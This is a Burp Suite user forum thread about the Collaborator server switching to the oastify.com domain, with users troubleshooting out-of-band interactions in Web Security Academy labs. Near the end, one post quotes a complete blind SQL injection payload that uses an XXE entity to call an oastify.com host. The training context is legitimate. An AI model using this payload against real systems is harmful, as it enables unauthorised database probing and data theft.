Burp Suite User Forum


collaborator dns changed to oastify.com ?

Radoslav | Last updated: Jun 03, 2022 02:21PM UTC

Has the mail collaborator been switched to use the oastify.com domain?

version: Professional v2202.3.9 build 13363

bodik

Liam, PortSwigger Agent | Last updated: Jun 03, 2022 04:38PM UTC

We've added a new domain name for the public Burp Collaborator server. Unless you have configured Burp to use a private Collaborator server, Burp Scanner and the Burp Collaborator client will now use oastify.com for their Collaborator payloads instead of burpcollaborator.net. This will help to reduce false negatives, enabling you to identify out-of-band vulnerabilities that were previously hidden due to widespread blocking of the old domain name. This new domain name is in addition to the old one, so you'll still be able to see interactions with any of your existing burpcollaborator.net payloads.

Please note that if you're running Burp within a closed network and previously had to allow connections to burpcollaborator.net on port 443 in order to poll for interactions, you may need to do the same for oastify.com.

- https://portswigger.net/burp/releases/professional-community-2022-3

Radoslav | Last updated: Jun 03, 2022 04:53PM UTC

Thanks for the quick response.

bodik

Crysthoffer | Last updated: Jul 07, 2022 01:22PM UTC

Also works for the Burp Academy? I'm trying to solve some labs using Collaborator but it's not working.

Liam, PortSwigger Agent | Last updated: Jul 08, 2022 05:46AM UTC

Hi Crysthoffer. Which labs are you having an issue with?

Hamza | Last updated: Apr 25, 2023 06:53AM UTC

Burp Collaborator URLs are not receiving the hits on some labs. Currently I have faced the issue on https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf

Liam, PortSwigger Agent | Last updated: Apr 25, 2023 09:38AM UTC

Hi Hamza. Thanks for your message. The lab is passing our testing; are you still encountering this issue?

Lukasz | Last updated: Jun 19, 2023 01:12PM UTC

Hi, the same problem occurs for XSS labs:

- Lab: Exploiting cross-site scripting to steal cookies https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies
- Lab: Exploiting cross-site scripting to capture passwords https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords

Both require Collaborator for the recommended solution, but it seems that *.oastify.com is blocked.

Liam, PortSwigger Agent | Last updated: Jun 20, 2023 10:38AM UTC

Thanks for your message, Lukasz.

Has this issue only occurred recently? Have you tried unblocking oastify.com?

Lukasz | Last updated: Jun 20, 2023 04:49PM UTC

I think *.oastify.com is blocked in lab environment. I cannot receive any request in my burp collaborator. Have you tested XSS labs which require burp collaborator (these two I mentioned before) if they work with oastify.com domain?

Ben, PortSwigger Agent | Last updated: Jun 21, 2023 10:00AM UTC

Hi Lukasz, All of the labs that require the use of the Burp Collaborator do now support the use of *.oastify.com. I have just run through both of the labs that you have mentioned and I am able to solve both of them using oastify.com. Do you have any further details of what you are entering in the blog post for each of the labs so that we can take a look at this for you?

ckid | Last updated: Mar 22, 2024 06:43PM UTC

Hi, I have the same issue with the lab "Blind SQL injection with out-of-band interaction." The payload is:

Cookie: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//gk4x1n5c53xebsu7lgud4sw3hunlbbz0.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual --

The payload is taken straight from the solution.

ckid | Last updated: Mar 22, 2024 07:07PM UTC

Never mind, it works :-)
